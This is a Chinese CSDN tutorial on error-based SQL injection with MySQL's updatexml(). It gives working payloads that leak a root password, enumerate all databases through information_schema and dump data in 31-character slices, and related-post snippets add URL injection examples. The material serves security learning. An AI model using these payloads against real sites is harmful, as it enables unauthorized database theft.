SQL注入之错误注入_基于updatexml()的脱库原理

已于 2024-06-23 10:31:26 修改
阅读量1.5w 收藏 16
点赞数 6
分类专栏: 网络安全面试题汇总 文章标签: 安全 web安全 网络安全
于 2021-06-21 13:48:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118084345
版权

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

updatexml() 常用来修改xml文件的内容

updatexml(参数1 , 参数2 , 参数3);

  • 参数1: 文件名 , 比如 a.xml
  • 参数2: 路径 , 比如 contry->city1 ( 不允许特殊字符 )
  • 参数3: 数值 , 比如 tianjing

 如果路径中存在特殊符号 比如'~',就会报错 , 同时后显示路径参数的内容

 路径参数的内容总会在错误提示中展示出来

 如果路径参数中包含函数 , 那么函数将会被执行 , 并将执行结果展示在报错内容中

select updatexml(1,concat('~',database()),3);

比如,查询当前使用的数据库

 此处的concat() , 可以将执行结果拼接一个'~'字符串 , 目的在于触发错误

 如果路径参数中包含SQL语句 , 同样会被执行 , 并将执行结果展示在报错内容中

select updatexml(1,concat('~',
(select password from user where username='root')
),3);

 基于此 , 可将SQL语句替换为其他语句 , 如获取所有数据库

select updatexml(1,
concat('~',(
select group_concat(schema_name) 
from information_schema.schemata
)),3);

 由于updatexml()返回的字符串长度最多为31个字符串 , 我们可以多次截取返回的字符串的不同位置,从而获取所有的数据库

select updatexml(1,concat('~',
substr(
(select group_concat(schema_name) 
from information_schema.schemata)
,1,31)
),3);

 从第1个字符开始 , 截取31个

 从第32个字符开始 , 截取31个

select updatexml(1,concat('~',
substr(
(select group_concat(schema_name) 
from information_schema.schemata)
,32,31)
),3);

 至此 , 已经获取了所有的数据库 , 通过此方法以此获取所有表 , 所有字段 , 实现脱库

士别三日wyx
关注
  • 6
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
updatexml函数
m0_62092622的博客
01-27 9170
先介绍一下updatexml函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称 第二个参数:XPath_string (Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以sql-labs第十七关为例 由于本关username过滤比较严格,所以password就成了注入点 根据报错来获取所需要的信...
SQL注入:基于报错的SQL注入
weixin_73180072的博客
12-04 268
基于报错的SQL注入
2、报错注入(详解)
最新发布
weixin_51520483的博客
05-17 985
报错注入中:①引入特定字符可以帮助确保输出内容在错误消息中完整显示,通过字符拼接的方式引入特定字符,例如:concat()②特定字符最好用十六进制的方式引入③附:ascll码十进制、十六进制对照表ASCII码16进制对照表_阿斯克码16进制-CSDN博客。
updatexml mysql_深入浅出带你玩转sqlilabs(四)-updatexml(),floor(),extractvalue()报错注入
weixin_39942108的博客
01-30 481
SQL各种参数类型下的注入测试数字型-sqlilabs less2前面文章已演示过字符型-sqlilabs less1前面文章已演示过搜索型-自写测试如:www.test.com/index.php?id=1www.test.com/index.php?id=abc(搜索型,一般产生在网站的搜索框)http://www.test.com/search.php?q=1区分参数类型的原因:当参数类型为...
SQL报错型注入原理-详细讲解 extractvalue()、updatexml()、floor() 的报错原因
大大大蜜蜂的博客
10-12 5111
SQL报错型注入原理 一、xpath语法格式错误的报错: mysql5.1.5版本中添加了extractvalue()、updatexml()函数,它们两个分别能够对XML文档进行查询、修改操作,下面分别对这两个函数进行介绍。 这里是MYSQL对extractvalue()和updatexml()的官方介绍 1、extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串中提取一个值。 xml_frag:xml文档对象的名称,是一个string类型。 xpat
SQL报错注入
qq_64332865的博客
02-18 587
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
SQL注入 报错(updatexml与extractvalue函数介绍)-01
09-15
SQL注入报错(updatexml与extractvalue函数介绍) SQL注入是一种常见的Web应用安全漏洞,它是指攻击者通过在Web应用的输入中inject恶意的SQL代码,来获取或修改数据库中的数据。今天,我们将讨论SQL注入报错的两种...
think3.2.3_sql注入分析1
08-03
在本文中,我们将深入探讨关于ThinkPHP 3.2.3版本中的SQL注入漏洞,特别是如何利用这个漏洞以及其成因。SQL注入是一种常见的安全漏洞,允许攻击者通过输入恶意SQL代码来操纵数据库,获取、修改或删除敏感数据。 ...
关于sql注入的简要演示(入坑抛砖)
09-09
本文将通过一个简单的示例来解释SQL注入的工作原理和演示如何利用它。 首先,我们需要理解SQL的基本概念。SQL,全称Structured Query Language,即结构化查询语言,是用于管理和操作关系型数据库的标准语言。当我们...
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sql盲注_updateXml报错注入
sugar_by的博客
06-03 459
函数updatexml(XML_document,XPath_string,new_value)包含三个参数 第一个参数是string格式,为XML文档对象名称,例如doc 第二个参数是路径 第三个参数是替换查找符合条件的数据 updatexml报错原理 同extractvalue()一样sql盲注_extractvalue报错注入 输入错误第二个参数,即更改路径的符号 正常语句 错误语句 利用updatexml()报错注入 判断字符型/数据型 判断闭合方式 可以判断为双引号闭合 查看有多少列 查询数据
学习基于extractvalue()和updatexml()的报错注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
SQL注入--基于错误的GET单引号字符型注入
Leslieyzz的博客
02-14 473
SQL注入--基于错误的GET单引号字符型注入
Web安全原理剖析(四)——报错注入攻击
Phantom03167的博客
09-10 1万+
报错注入攻击
22、注入篇————MYSQL数据库updatexml报错注入
Fly_鹏程万里
03-02 6858
MYSQL数据库updatexml报错注入爆数据库版本信息http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)链接用户http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT user...
利用insert,update和delete注入获取数据
阿金正传
04-18 1万+
转自: http://drops.wooyun.org/tips/2078 0x00 简介 利用SQL注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注以及延时注入,通常这些方法都是基于select查询语句中的SQL注射点来实现的。那么,当我们发现了一个基于insert、update、delete语句的注射点时(比如有的网站会记录用户浏览记录,包括refer
SQL注入Update注入
weixin_43765321的博客
03-03 5536
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
基于报错的 SQL 注入
Cwillchris的博客
06-04 134
超详细sql报错注入原理讲解
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值